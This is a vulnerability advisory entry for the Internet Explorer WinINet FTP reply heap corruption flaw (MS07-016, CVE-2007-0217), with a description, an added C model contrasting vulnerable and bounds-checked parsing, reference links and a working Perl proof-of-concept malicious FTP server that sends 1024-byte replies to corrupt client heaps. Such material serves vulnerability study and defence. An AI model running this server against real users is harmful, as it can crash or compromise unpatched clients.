Microsoft IE WinINet.DLL FTP Server Response Memory Corruption Vulnerability (MS07-016)

Vulnerability ID: 1112400    Vulnerability type: boundary condition error
Published: 2007-03-09    Updated: 2007-03-09
CVE ID: CVE-2007-0217    CNNVD ID: CNNVD-200702-237
Platform: Windows    CVSS score: 10.0
|Vulnerability sources
https://www.exploit-db.com/exploits/3444
https://www.securityfocus.com/bid/22489
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-237
|Vulnerability details
Internet Explorer is Microsoft's widely used web browser. Internet Explorer contains a memory corruption vulnerability in the parsing of reply lines from a remote FTP server; a remote attacker could exploit it to cause a denial of service against the IE client or to execute arbitrary code. During an FTP session the client asks the server to perform an operation, and the server answers with a numeric code, a human-readable message or other information. Because a reply may span several lines, the client code splits the reply into lines and appends a null byte (0x00) after the last character of each line. If a line ends exactly at the last character of the reply buffer, the terminating null byte is written outside the allocated space, overwriting one byte of the heap management structures. By sending a sequence of specially crafted replies to the client, an attacker can corrupt the heap and cause arbitrary code execution.
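Added illustration, not taken from the advisory, from the PoC below, or from Microsoft's code: a constructed C model of the off-by-one terminator write described above, beside a bounds-checked version. The reply buffer is modeled as 1024 bytes followed by one canary byte standing in for the adjacent heap management byte, so the overflow is observable without corrupting a real heap. Function and constant names (read_reply_line_vuln, read_reply_line_fixed, canary_clobbered, REPLY_BUF, CANARY) are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define REPLY_BUF 1024          /* reply buffer size named in the advisory */
#define CANARY    0xA5          /* constructed stand-in for the heap byte after the buffer */

/* Constructed model of the flawed logic (an assumption, not wininet.dll's code):
 * copy reply bytes into buf until a '\n' is seen or REPLY_BUF bytes are consumed,
 * then append a NUL. Returns the number of reply bytes consumed. */
size_t read_reply_line_vuln(const char *stream, size_t avail, char *buf)
{
    size_t n = 0;
    while (n < REPLY_BUF && n < avail) {
        buf[n] = stream[n];
        n++;
        if (buf[n - 1] == '\n')
            break;
    }
    buf[n] = '\0';              /* BUG: n == REPLY_BUF when the line fills the buffer exactly */
    return n;
}

/* Bounds-checked variant: one byte is reserved for the terminator, so at most
 * REPLY_BUF - 1 reply bytes are copied and the NUL always lands inside buf.
 * A caller that needs the rest of an over-long line calls again with the
 * remainder (avail minus the returned count). */
size_t read_reply_line_fixed(const char *stream, size_t avail, char *buf)
{
    size_t n = 0;
    while (n < REPLY_BUF - 1 && n < avail) {
        buf[n] = stream[n];
        n++;
        if (buf[n - 1] == '\n')
            break;
    }
    buf[n] = '\0';              /* n <= REPLY_BUF - 1, always in bounds */
    return n;
}

/* Builds the reply shape the PoC sends: "<code> " + 'A' padding + "\r\n",
 * exactly REPLY_BUF bytes long. out must hold REPLY_BUF bytes. */
size_t make_poc_reply(char *out, const char *code)
{
    size_t prefix = strlen(code);
    memcpy(out, code, prefix);
    memset(out + prefix, 'A', REPLY_BUF - prefix - 2);
    out[REPLY_BUF - 2] = '\r';
    out[REPLY_BUF - 1] = '\n';
    return REPLY_BUF;
}

/* Runs one reader over a reply and reports whether the byte just past the
 * REPLY_BUF-byte buffer (the canary) was overwritten. 1 = clobbered, 0 = intact. */
int canary_clobbered(size_t (*reader)(const char *, size_t, char *),
                     const char *reply, size_t len)
{
    char region[REPLY_BUF + 1];             /* buffer plus one canary byte */
    memset(region, 0, sizeof region);
    region[REPLY_BUF] = (char)CANARY;
    reader(reply, len, region);
    return (unsigned char)region[REPLY_BUF] != CANARY;
}

int main(void)
{
    char reply[REPLY_BUF];
    size_t len = make_poc_reply(reply, "200 ");
    const char *benign = "220 ready\r\n";   /* constructed short reply */

    printf("1024-byte reply, vulnerable reader: canary %s\n",
           canary_clobbered(read_reply_line_vuln, reply, len) ? "clobbered" : "intact");
    printf("1024-byte reply, fixed reader:      canary %s\n",
           canary_clobbered(read_reply_line_fixed, reply, len) ? "clobbered" : "intact");
    printf("short reply, vulnerable reader:     canary %s\n",
           canary_clobbered(read_reply_line_vuln, benign, strlen(benign)) ? "clobbered" : "intact");
    return 0;
}
```

The short reply shows why ordinary FTP traffic never triggers the defect: only a line whose terminating newline lands on the buffer's last byte pushes the NUL write one past the end, which is exactly the 1024-byte shape the PoC constructs.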
|Exploit
#!/usr/bin/perl

# MS 07-016 FTP Server Response PoC
# Usage: ./ms07016ftp.pl [LISTEN_IP]
#
# Tested Against: MSIE 6.02900.2180 (SP2)
#
# Details: The response is broken into buffers, either at length 1024,
#          or at '\r\n'. Each buffer is appended with \x00, without
#          bounds checking.  If the response is exactly 1024 characters
#          in length, you will overflow the heap with the string \x00.

use IO::Socket;
use strict;

# Create listener
my $ip = shift || '127.0.0.1';
my $sock = IO::Socket::INET->new(Listen    => 1,
                                 LocalHost => $ip,
                                 LocalPort => '21',
                                 Proto     => 'tcp');
$sock or die("Could not create listener.\nMake sure no FTP server is running, and you are running this as root.\n");

# Wait for initial connection and send banner
my $sock_in = $sock->accept();
print $sock_in "220 waa waa wee waa\r\n";

# Send response code with total length of response = 1024
while (<$sock_in>) {
    # Each request arrives as "CMD args\r\n"; compare only the command word,
    # case-insensitively (the original compared the whole line and never matched)
    my ($cmd) = split ' ', $_;
    $cmd = uc(defined $cmd ? $cmd : '');
    my $response;
    if    ($cmd eq "USER") { $response = "331 "; }
    elsif ($cmd eq "PASS") { $response = "230 "; }
    elsif ($cmd eq "SYST") { $response = "215 "; }
    elsif ($cmd eq "CWD")  { $response = "250 "; }
    elsif ($cmd eq "PWD")  { $response = "230 "; }
    else                   { $response = "200 "; }
    print $sock_in $response . "A" x (1024 - length($response) - 2) . "\r\n";
}
close($sock);

# milw0rm.com [2007-03-09]
|Affected products
Nortel Networks Symposium Network Control Center (NCC) Nortel Networks Contact Center Manager Server 0 Nortel Networks Contact Center Manager Nortel Networks Contact Center Express Nor
|References

Source: US-CERT
Name: VU#613564
Link: http://www.kb.cert.org/vuls/id/613564
Source: US-CERT
Name: TA07-044A
Link: http://www.us-cert.gov/cas/techalerts/TA07-044A.html
Source: MS
Name: MS07-016
Link: http://www.microsoft.com/technet/security/Bulletin/MS07-016.mspx
Source: SECTRACK
Name: 1017642
Link: http://www.securitytracker.com/id?1017642
Source: BID
Name: 22489
Link: http://www.securityfocus.com/bid/22489
Source: OSVDB
Name: 31892
Link: http://www.osvdb.org/31892
Source: VUPEN
Name: ADV-2007-0584
Link: http://www.frsirt.com/english/advisories/2007/0584
Source: SECUNIA
Name: 24156
Link: http://secunia.com/advisories/24156
Source: IDEFENSE
Name: 20070213 Microsoft 'wininet.dll' FTP Reply Null Termination Heap Corruption Vulnerability
Link: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=473
Source: BUGTRAQ
Name: 20070309 MS07-016 FTP Response DOS PoC
Link: http://www.securityfocus.com/archive/1/archive/1/462303/100/0/threaded
Source: US Government Resource: oval:org.mitre.oval:def:1141
Name: oval:org.mitre.oval:def:1141
Link: http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:1